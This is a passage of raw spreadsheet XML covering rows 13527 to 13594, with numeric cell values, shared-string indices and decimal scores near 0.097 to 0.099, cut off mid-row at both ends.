        <v>10480</v>
      </c>
      <c r="F13527" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13528" ht="15.75" customHeight="1">
      <c r="A13528" s="1">
        <v>15057.0</v>
      </c>
      <c r="B13528" s="2">
        <v>4.1676384E7</v>
      </c>
      <c r="C13528" s="2" t="s">
        <v>13016</v>
      </c>
      <c r="D13528" s="2">
        <v>1.0</v>
      </c>
      <c r="E13528" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13528" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13529" ht="15.75" customHeight="1">
      <c r="A13529" s="1">
        <v>15239.0</v>
      </c>
      <c r="B13529" s="2">
        <v>4.2269275E7</v>
      </c>
      <c r="C13529" s="2" t="s">
        <v>13017</v>
      </c>
      <c r="D13529" s="2">
        <v>1.0</v>
      </c>
      <c r="E13529" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13529" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13530" ht="15.75" customHeight="1">
      <c r="A13530" s="1">
        <v>15775.0</v>
      </c>
      <c r="B13530" s="2">
        <v>4.4184276E7</v>
      </c>
      <c r="C13530" s="2" t="s">
        <v>13018</v>
      </c>
      <c r="D13530" s="2">
        <v>1.0</v>
      </c>
      <c r="E13530" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13530" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13531" ht="15.75" customHeight="1">
      <c r="A13531" s="1">
        <v>16519.0</v>
      </c>
      <c r="B13531" s="2">
        <v>4.6643777E7</v>
      </c>
      <c r="C13531" s="2" t="s">
        <v>13019</v>
      </c>
      <c r="D13531" s="2">
        <v>1.0</v>
      </c>
      <c r="E13531" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13531" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13532" ht="15.75" customHeight="1">
      <c r="A13532" s="1">
        <v>16881.0</v>
      </c>
      <c r="B13532" s="2">
        <v>4.799162E7</v>
      </c>
      <c r="C13532" s="2" t="s">
        <v>13020</v>
      </c>
      <c r="D13532" s="2">
        <v>1.0</v>
      </c>
      <c r="E13532" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13532" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13533" ht="15.75" customHeight="1">
      <c r="A13533" s="1">
        <v>16984.0</v>
      </c>
      <c r="B13533" s="2">
        <v>4.8327119E7</v>
      </c>
      <c r="C13533" s="2" t="s">
        <v>13021</v>
      </c>
      <c r="D13533" s="2">
        <v>1.0</v>
      </c>
      <c r="E13533" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13533" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13534" ht="15.75" customHeight="1">
      <c r="A13534" s="1">
        <v>17861.0</v>
      </c>
      <c r="B13534" s="2">
        <v>5.0992041E7</v>
      </c>
      <c r="C13534" s="2" t="s">
        <v>13022</v>
      </c>
      <c r="D13534" s="2">
        <v>1.0</v>
      </c>
      <c r="E13534" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13534" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13535" ht="15.75" customHeight="1">
      <c r="A13535" s="1">
        <v>18047.0</v>
      </c>
      <c r="B13535" s="2">
        <v>5.1565267E7</v>
      </c>
      <c r="C13535" s="2" t="s">
        <v>13023</v>
      </c>
      <c r="D13535" s="2">
        <v>1.0</v>
      </c>
      <c r="E13535" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13535" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13536" ht="15.75" customHeight="1">
      <c r="A13536" s="1">
        <v>18083.0</v>
      </c>
      <c r="B13536" s="2">
        <v>5.1640511E7</v>
      </c>
      <c r="C13536" s="2" t="s">
        <v>13024</v>
      </c>
      <c r="D13536" s="2">
        <v>1.0</v>
      </c>
      <c r="E13536" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13536" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13537" ht="15.75" customHeight="1">
      <c r="A13537" s="1">
        <v>18460.0</v>
      </c>
      <c r="B13537" s="2">
        <v>5.2830591E7</v>
      </c>
      <c r="C13537" s="2" t="s">
        <v>13025</v>
      </c>
      <c r="D13537" s="2">
        <v>1.0</v>
      </c>
      <c r="E13537" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13537" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13538" ht="15.75" customHeight="1">
      <c r="A13538" s="1">
        <v>18770.0</v>
      </c>
      <c r="B13538" s="2">
        <v>5.3789958E7</v>
      </c>
      <c r="C13538" s="2" t="s">
        <v>13026</v>
      </c>
      <c r="D13538" s="2">
        <v>1.0</v>
      </c>
      <c r="E13538" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13538" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13539" ht="15.75" customHeight="1">
      <c r="A13539" s="1">
        <v>19599.0</v>
      </c>
      <c r="B13539" s="2">
        <v>5.6182858E7</v>
      </c>
      <c r="C13539" s="2" t="s">
        <v>13027</v>
      </c>
      <c r="D13539" s="2">
        <v>1.0</v>
      </c>
      <c r="E13539" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13539" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13540" ht="15.75" customHeight="1">
      <c r="A13540" s="1">
        <v>19600.0</v>
      </c>
      <c r="B13540" s="2">
        <v>5.6182858E7</v>
      </c>
      <c r="C13540" s="2" t="s">
        <v>13028</v>
      </c>
      <c r="D13540" s="2">
        <v>1.0</v>
      </c>
      <c r="E13540" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13540" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13541" ht="15.75" customHeight="1">
      <c r="A13541" s="1">
        <v>24498.0</v>
      </c>
      <c r="B13541" s="2">
        <v>1.1090924E7</v>
      </c>
      <c r="C13541" s="2" t="s">
        <v>13029</v>
      </c>
      <c r="D13541" s="2">
        <v>1.0</v>
      </c>
      <c r="E13541" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13541" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13542" ht="15.75" customHeight="1">
      <c r="A13542" s="1">
        <v>24758.0</v>
      </c>
      <c r="B13542" s="2">
        <v>1.1816895E7</v>
      </c>
      <c r="C13542" s="2" t="s">
        <v>13030</v>
      </c>
      <c r="D13542" s="2">
        <v>1.0</v>
      </c>
      <c r="E13542" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13542" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13543" ht="15.75" customHeight="1">
      <c r="A13543" s="1">
        <v>24953.0</v>
      </c>
      <c r="B13543" s="2">
        <v>1.2594487E7</v>
      </c>
      <c r="C13543" s="2" t="s">
        <v>13031</v>
      </c>
      <c r="D13543" s="2">
        <v>1.0</v>
      </c>
      <c r="E13543" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13543" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13544" ht="15.75" customHeight="1">
      <c r="A13544" s="1">
        <v>25588.0</v>
      </c>
      <c r="B13544" s="2">
        <v>1.4341177E7</v>
      </c>
      <c r="C13544" s="2" t="s">
        <v>13032</v>
      </c>
      <c r="D13544" s="2">
        <v>1.0</v>
      </c>
      <c r="E13544" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13544" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13545" ht="15.75" customHeight="1">
      <c r="A13545" s="1">
        <v>29337.0</v>
      </c>
      <c r="B13545" s="2">
        <v>3.1333074E7</v>
      </c>
      <c r="C13545" s="2" t="s">
        <v>13033</v>
      </c>
      <c r="D13545" s="2">
        <v>1.0</v>
      </c>
      <c r="E13545" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13545" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13546" ht="15.75" customHeight="1">
      <c r="A13546" s="1">
        <v>29625.0</v>
      </c>
      <c r="B13546" s="2">
        <v>3.3673804E7</v>
      </c>
      <c r="C13546" s="2" t="s">
        <v>13034</v>
      </c>
      <c r="D13546" s="2">
        <v>1.0</v>
      </c>
      <c r="E13546" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13546" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13547" ht="15.75" customHeight="1">
      <c r="A13547" s="1">
        <v>31188.0</v>
      </c>
      <c r="B13547" s="2">
        <v>4.9145148E7</v>
      </c>
      <c r="C13547" s="2" t="s">
        <v>13035</v>
      </c>
      <c r="D13547" s="2">
        <v>1.0</v>
      </c>
      <c r="E13547" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13547" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="13548" ht="15.75" customHeight="1">
      <c r="A13548" s="1">
        <v>12022.0</v>
      </c>
      <c r="B13548" s="2">
        <v>2.6051383E7</v>
      </c>
      <c r="C13548" s="2" t="s">
        <v>13036</v>
      </c>
      <c r="D13548" s="2">
        <v>1.0</v>
      </c>
      <c r="E13548" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13548" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="13549" ht="15.75" customHeight="1">
      <c r="A13549" s="1">
        <v>1773.0</v>
      </c>
      <c r="B13549" s="2">
        <v>2.9028157E7</v>
      </c>
      <c r="C13549" s="2" t="s">
        <v>13037</v>
      </c>
      <c r="D13549" s="2">
        <v>1.0</v>
      </c>
      <c r="E13549" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13549" s="2">
        <v>0.09912854030501085</v>
      </c>
    </row>
    <row r="13550" ht="15.75" customHeight="1">
      <c r="A13550" s="1">
        <v>4539.0</v>
      </c>
      <c r="B13550" s="2">
        <v>4.2659056E7</v>
      </c>
      <c r="C13550" s="2" t="s">
        <v>13038</v>
      </c>
      <c r="D13550" s="2">
        <v>1.0</v>
      </c>
      <c r="E13550" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13550" s="2">
        <v>0.09912854030501085</v>
      </c>
    </row>
    <row r="13551" ht="15.75" customHeight="1">
      <c r="A13551" s="1">
        <v>13250.0</v>
      </c>
      <c r="B13551" s="2">
        <v>3.4265174E7</v>
      </c>
      <c r="C13551" s="2" t="s">
        <v>13039</v>
      </c>
      <c r="D13551" s="2">
        <v>1.0</v>
      </c>
      <c r="E13551" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13551" s="2">
        <v>0.09912854030501085</v>
      </c>
    </row>
    <row r="13552" ht="15.75" customHeight="1">
      <c r="A13552" s="1">
        <v>11120.0</v>
      </c>
      <c r="B13552" s="2">
        <v>1.8934943E7</v>
      </c>
      <c r="C13552" s="2" t="s">
        <v>13040</v>
      </c>
      <c r="D13552" s="2">
        <v>1.0</v>
      </c>
      <c r="E13552" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13552" s="2">
        <v>0.09887005649717513</v>
      </c>
    </row>
    <row r="13553" ht="15.75" customHeight="1">
      <c r="A13553" s="1">
        <v>17857.0</v>
      </c>
      <c r="B13553" s="2">
        <v>5.0984819E7</v>
      </c>
      <c r="C13553" s="2" t="s">
        <v>13041</v>
      </c>
      <c r="D13553" s="2">
        <v>1.0</v>
      </c>
      <c r="E13553" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13553" s="2">
        <v>0.09821428571428573</v>
      </c>
    </row>
    <row r="13554" ht="15.75" customHeight="1">
      <c r="A13554" s="1">
        <v>28149.0</v>
      </c>
      <c r="B13554" s="2">
        <v>2.4824437E7</v>
      </c>
      <c r="C13554" s="2" t="s">
        <v>13042</v>
      </c>
      <c r="D13554" s="2">
        <v>1.0</v>
      </c>
      <c r="E13554" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13554" s="2">
        <v>0.09821428571428571</v>
      </c>
    </row>
    <row r="13555" ht="15.75" customHeight="1">
      <c r="A13555" s="1">
        <v>17855.0</v>
      </c>
      <c r="B13555" s="2">
        <v>5.0984819E7</v>
      </c>
      <c r="C13555" s="2" t="s">
        <v>13043</v>
      </c>
      <c r="D13555" s="2">
        <v>1.0</v>
      </c>
      <c r="E13555" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13555" s="2">
        <v>0.0982142857142857</v>
      </c>
    </row>
    <row r="13556" ht="15.75" customHeight="1">
      <c r="A13556" s="1">
        <v>33507.0</v>
      </c>
      <c r="B13556" s="2">
        <v>8077921.0</v>
      </c>
      <c r="C13556" s="2" t="s">
        <v>13044</v>
      </c>
      <c r="D13556" s="2">
        <v>1.0</v>
      </c>
      <c r="E13556" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13556" s="2">
        <v>0.09809027777777776</v>
      </c>
    </row>
    <row r="13557" ht="15.75" customHeight="1">
      <c r="A13557" s="1">
        <v>2702.0</v>
      </c>
      <c r="B13557" s="2">
        <v>3.4854249E7</v>
      </c>
      <c r="C13557" s="2" t="s">
        <v>13045</v>
      </c>
      <c r="D13557" s="2">
        <v>1.0</v>
      </c>
      <c r="E13557" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13557" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="13558" ht="15.75" customHeight="1">
      <c r="A13558" s="1">
        <v>32109.0</v>
      </c>
      <c r="B13558" s="2">
        <v>5.4078661E7</v>
      </c>
      <c r="C13558" s="2" t="s">
        <v>13046</v>
      </c>
      <c r="D13558" s="2">
        <v>1.0</v>
      </c>
      <c r="E13558" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13558" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="13559" ht="15.75" customHeight="1">
      <c r="A13559" s="1">
        <v>12173.0</v>
      </c>
      <c r="B13559" s="2">
        <v>2.7452521E7</v>
      </c>
      <c r="C13559" s="2" t="s">
        <v>13047</v>
      </c>
      <c r="D13559" s="2">
        <v>1.0</v>
      </c>
      <c r="E13559" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13559" s="2">
        <v>0.09797979797979794</v>
      </c>
    </row>
    <row r="13560" ht="15.75" customHeight="1">
      <c r="A13560" s="1">
        <v>14346.0</v>
      </c>
      <c r="B13560" s="2">
        <v>3.8865582E7</v>
      </c>
      <c r="C13560" s="2" t="s">
        <v>13048</v>
      </c>
      <c r="D13560" s="2">
        <v>1.0</v>
      </c>
      <c r="E13560" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13560" s="2">
        <v>0.09797979797979794</v>
      </c>
    </row>
    <row r="13561" ht="15.75" customHeight="1">
      <c r="A13561" s="1">
        <v>27798.0</v>
      </c>
      <c r="B13561" s="2">
        <v>2.3153841E7</v>
      </c>
      <c r="C13561" s="2" t="s">
        <v>13049</v>
      </c>
      <c r="D13561" s="2">
        <v>1.0</v>
      </c>
      <c r="E13561" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13561" s="2">
        <v>0.09797979797979793</v>
      </c>
    </row>
    <row r="13562" ht="15.75" customHeight="1">
      <c r="A13562" s="1">
        <v>3443.0</v>
      </c>
      <c r="B13562" s="2">
        <v>3.8265513E7</v>
      </c>
      <c r="C13562" s="2" t="s">
        <v>13050</v>
      </c>
      <c r="D13562" s="2">
        <v>1.0</v>
      </c>
      <c r="E13562" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13562" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="13563" ht="15.75" customHeight="1">
      <c r="A13563" s="1">
        <v>9829.0</v>
      </c>
      <c r="B13563" s="2">
        <v>5.663441E7</v>
      </c>
      <c r="C13563" s="2" t="s">
        <v>13051</v>
      </c>
      <c r="D13563" s="2">
        <v>1.0</v>
      </c>
      <c r="E13563" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13563" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="13564" ht="15.75" customHeight="1">
      <c r="A13564" s="1">
        <v>17473.0</v>
      </c>
      <c r="B13564" s="2">
        <v>4.9916309E7</v>
      </c>
      <c r="C13564" s="2" t="s">
        <v>13052</v>
      </c>
      <c r="D13564" s="2">
        <v>1.0</v>
      </c>
      <c r="E13564" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13564" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="13565" ht="15.75" customHeight="1">
      <c r="A13565" s="1">
        <v>20072.0</v>
      </c>
      <c r="B13565" s="2">
        <v>891707.0</v>
      </c>
      <c r="C13565" s="2" t="s">
        <v>13053</v>
      </c>
      <c r="D13565" s="2">
        <v>1.0</v>
      </c>
      <c r="E13565" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13565" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="13566" ht="15.75" customHeight="1">
      <c r="A13566" s="1">
        <v>24075.0</v>
      </c>
      <c r="B13566" s="2">
        <v>9680063.0</v>
      </c>
      <c r="C13566" s="2" t="s">
        <v>13054</v>
      </c>
      <c r="D13566" s="2">
        <v>1.0</v>
      </c>
      <c r="E13566" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13566" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="13567" ht="15.75" customHeight="1">
      <c r="A13567" s="1">
        <v>6024.0</v>
      </c>
      <c r="B13567" s="2">
        <v>4.7505943E7</v>
      </c>
      <c r="C13567" s="2" t="s">
        <v>13055</v>
      </c>
      <c r="D13567" s="2">
        <v>1.0</v>
      </c>
      <c r="E13567" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13567" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="13568" ht="15.75" customHeight="1">
      <c r="A13568" s="1">
        <v>6880.0</v>
      </c>
      <c r="B13568" s="2">
        <v>4.9722837E7</v>
      </c>
      <c r="C13568" s="2" t="s">
        <v>13056</v>
      </c>
      <c r="D13568" s="2">
        <v>1.0</v>
      </c>
      <c r="E13568" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13568" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="13569" ht="15.75" customHeight="1">
      <c r="A13569" s="1">
        <v>7432.0</v>
      </c>
      <c r="B13569" s="2">
        <v>5.1184006E7</v>
      </c>
      <c r="C13569" s="2" t="s">
        <v>13057</v>
      </c>
      <c r="D13569" s="2">
        <v>1.0</v>
      </c>
      <c r="E13569" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13569" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="13570" ht="15.75" customHeight="1">
      <c r="A13570" s="1">
        <v>8005.0</v>
      </c>
      <c r="B13570" s="2">
        <v>5.2784878E7</v>
      </c>
      <c r="C13570" s="2" t="s">
        <v>13058</v>
      </c>
      <c r="D13570" s="2">
        <v>1.0</v>
      </c>
      <c r="E13570" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13570" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="13571" ht="15.75" customHeight="1">
      <c r="A13571" s="1">
        <v>8218.0</v>
      </c>
      <c r="B13571" s="2">
        <v>5.3334292E7</v>
      </c>
      <c r="C13571" s="2" t="s">
        <v>13059</v>
      </c>
      <c r="D13571" s="2">
        <v>1.0</v>
      </c>
      <c r="E13571" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13571" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="13572" ht="15.75" customHeight="1">
      <c r="A13572" s="1">
        <v>8712.0</v>
      </c>
      <c r="B13572" s="2">
        <v>5.4454499E7</v>
      </c>
      <c r="C13572" s="2" t="s">
        <v>13060</v>
      </c>
      <c r="D13572" s="2">
        <v>1.0</v>
      </c>
      <c r="E13572" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13572" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="13573" ht="15.75" customHeight="1">
      <c r="A13573" s="1">
        <v>11755.0</v>
      </c>
      <c r="B13573" s="2">
        <v>2.412659E7</v>
      </c>
      <c r="C13573" s="2" t="s">
        <v>13061</v>
      </c>
      <c r="D13573" s="2">
        <v>1.0</v>
      </c>
      <c r="E13573" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13573" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="13574" ht="15.75" customHeight="1">
      <c r="A13574" s="1">
        <v>16227.0</v>
      </c>
      <c r="B13574" s="2">
        <v>4.5728461E7</v>
      </c>
      <c r="C13574" s="2" t="s">
        <v>13062</v>
      </c>
      <c r="D13574" s="2">
        <v>1.0</v>
      </c>
      <c r="E13574" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13574" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="13575" ht="15.75" customHeight="1">
      <c r="A13575" s="1">
        <v>17887.0</v>
      </c>
      <c r="B13575" s="2">
        <v>5.1053654E7</v>
      </c>
      <c r="C13575" s="2" t="s">
        <v>13063</v>
      </c>
      <c r="D13575" s="2">
        <v>1.0</v>
      </c>
      <c r="E13575" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13575" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="13576" ht="15.75" customHeight="1">
      <c r="A13576" s="1">
        <v>18944.0</v>
      </c>
      <c r="B13576" s="2">
        <v>5.4344522E7</v>
      </c>
      <c r="C13576" s="2" t="s">
        <v>13064</v>
      </c>
      <c r="D13576" s="2">
        <v>1.0</v>
      </c>
      <c r="E13576" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13576" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="13577" ht="15.75" customHeight="1">
      <c r="A13577" s="1">
        <v>19978.0</v>
      </c>
      <c r="B13577" s="2">
        <v>5.760469E7</v>
      </c>
      <c r="C13577" s="2" t="s">
        <v>13065</v>
      </c>
      <c r="D13577" s="2">
        <v>1.0</v>
      </c>
      <c r="E13577" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13577" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="13578" ht="15.75" customHeight="1">
      <c r="A13578" s="1">
        <v>20260.0</v>
      </c>
      <c r="B13578" s="2">
        <v>1.10505E7</v>
      </c>
      <c r="C13578" s="2" t="s">
        <v>13066</v>
      </c>
      <c r="D13578" s="2">
        <v>1.0</v>
      </c>
      <c r="E13578" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13578" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="13579" ht="15.75" customHeight="1">
      <c r="A13579" s="1">
        <v>20399.0</v>
      </c>
      <c r="B13579" s="2">
        <v>1.2168682E7</v>
      </c>
      <c r="C13579" s="2" t="s">
        <v>13067</v>
      </c>
      <c r="D13579" s="2">
        <v>1.0</v>
      </c>
      <c r="E13579" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13579" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="13580" ht="15.75" customHeight="1">
      <c r="A13580" s="1">
        <v>21939.0</v>
      </c>
      <c r="B13580" s="2">
        <v>2.8674782E7</v>
      </c>
      <c r="C13580" s="2" t="s">
        <v>13068</v>
      </c>
      <c r="D13580" s="2">
        <v>1.0</v>
      </c>
      <c r="E13580" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13580" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="13581" ht="15.75" customHeight="1">
      <c r="A13581" s="1">
        <v>25350.0</v>
      </c>
      <c r="B13581" s="2">
        <v>1.3552037E7</v>
      </c>
      <c r="C13581" s="2" t="s">
        <v>13069</v>
      </c>
      <c r="D13581" s="2">
        <v>1.0</v>
      </c>
      <c r="E13581" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13581" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="13582" ht="15.75" customHeight="1">
      <c r="A13582" s="1">
        <v>30128.0</v>
      </c>
      <c r="B13582" s="2">
        <v>3.6961577E7</v>
      </c>
      <c r="C13582" s="2" t="s">
        <v>13070</v>
      </c>
      <c r="D13582" s="2">
        <v>1.0</v>
      </c>
      <c r="E13582" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13582" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="13583" ht="15.75" customHeight="1">
      <c r="A13583" s="1">
        <v>94.0</v>
      </c>
      <c r="B13583" s="2">
        <v>1.2134249E7</v>
      </c>
      <c r="C13583" s="2" t="s">
        <v>13071</v>
      </c>
      <c r="D13583" s="2">
        <v>1.0</v>
      </c>
      <c r="E13583" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13583" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13584" ht="15.75" customHeight="1">
      <c r="A13584" s="1">
        <v>323.0</v>
      </c>
      <c r="B13584" s="2">
        <v>1.5714531E7</v>
      </c>
      <c r="C13584" s="2" t="s">
        <v>13072</v>
      </c>
      <c r="D13584" s="2">
        <v>1.0</v>
      </c>
      <c r="E13584" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13584" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13585" ht="15.75" customHeight="1">
      <c r="A13585" s="1">
        <v>430.0</v>
      </c>
      <c r="B13585" s="2">
        <v>1.696793E7</v>
      </c>
      <c r="C13585" s="2" t="s">
        <v>13073</v>
      </c>
      <c r="D13585" s="2">
        <v>1.0</v>
      </c>
      <c r="E13585" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13585" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13586" ht="15.75" customHeight="1">
      <c r="A13586" s="1">
        <v>825.0</v>
      </c>
      <c r="B13586" s="2">
        <v>2.1533987E7</v>
      </c>
      <c r="C13586" s="2" t="s">
        <v>13074</v>
      </c>
      <c r="D13586" s="2">
        <v>1.0</v>
      </c>
      <c r="E13586" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13586" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13587" ht="15.75" customHeight="1">
      <c r="A13587" s="1">
        <v>1024.0</v>
      </c>
      <c r="B13587" s="2">
        <v>2.3169827E7</v>
      </c>
      <c r="C13587" s="2" t="s">
        <v>13075</v>
      </c>
      <c r="D13587" s="2">
        <v>1.0</v>
      </c>
      <c r="E13587" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13587" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13588" ht="15.75" customHeight="1">
      <c r="A13588" s="1">
        <v>1453.0</v>
      </c>
      <c r="B13588" s="2">
        <v>2.6838953E7</v>
      </c>
      <c r="C13588" s="2" t="s">
        <v>13076</v>
      </c>
      <c r="D13588" s="2">
        <v>1.0</v>
      </c>
      <c r="E13588" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13588" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13589" ht="15.75" customHeight="1">
      <c r="A13589" s="1">
        <v>2512.0</v>
      </c>
      <c r="B13589" s="2">
        <v>3.399291E7</v>
      </c>
      <c r="C13589" s="2" t="s">
        <v>13077</v>
      </c>
      <c r="D13589" s="2">
        <v>1.0</v>
      </c>
      <c r="E13589" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13589" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13590" ht="15.75" customHeight="1">
      <c r="A13590" s="1">
        <v>2842.0</v>
      </c>
      <c r="B13590" s="2">
        <v>3.5448629E7</v>
      </c>
      <c r="C13590" s="2" t="s">
        <v>13078</v>
      </c>
      <c r="D13590" s="2">
        <v>1.0</v>
      </c>
      <c r="E13590" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13590" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13591" ht="15.75" customHeight="1">
      <c r="A13591" s="1">
        <v>2879.0</v>
      </c>
      <c r="B13591" s="2">
        <v>3.5657671E7</v>
      </c>
      <c r="C13591" s="2" t="s">
        <v>13079</v>
      </c>
      <c r="D13591" s="2">
        <v>1.0</v>
      </c>
      <c r="E13591" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13591" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13592" ht="15.75" customHeight="1">
      <c r="A13592" s="1">
        <v>3509.0</v>
      </c>
      <c r="B13592" s="2">
        <v>3.8545489E7</v>
      </c>
      <c r="C13592" s="2" t="s">
        <v>13080</v>
      </c>
      <c r="D13592" s="2">
        <v>1.0</v>
      </c>
      <c r="E13592" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13592" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13593" ht="15.75" customHeight="1">
      <c r="A13593" s="1">
        <v>3667.0</v>
      </c>
      <c r="B13593" s="2">
        <v>3.9391706E7</v>
      </c>
      <c r="C13593" s="2" t="s">
        <v>13081</v>
      </c>
      <c r="D13593" s="2">
        <v>1.0</v>
      </c>
      <c r="E13593" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13593" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13594" ht="15.75" customHeight="1">
      <c r="A13594" s="1">
        <v>3828.0</v>
      </c>
      <c r="B13594" s="2">
        <v>4.0156905E7</v>
      </c>
      <c r="C13594" s="2" t="s">
        <v>13082</v>
      </c>
      <c r="D13594" s="2">
        <v>1.0</v>
      </c>
      <c r="E13594" s="3" t="s">
        <v>10480</v>
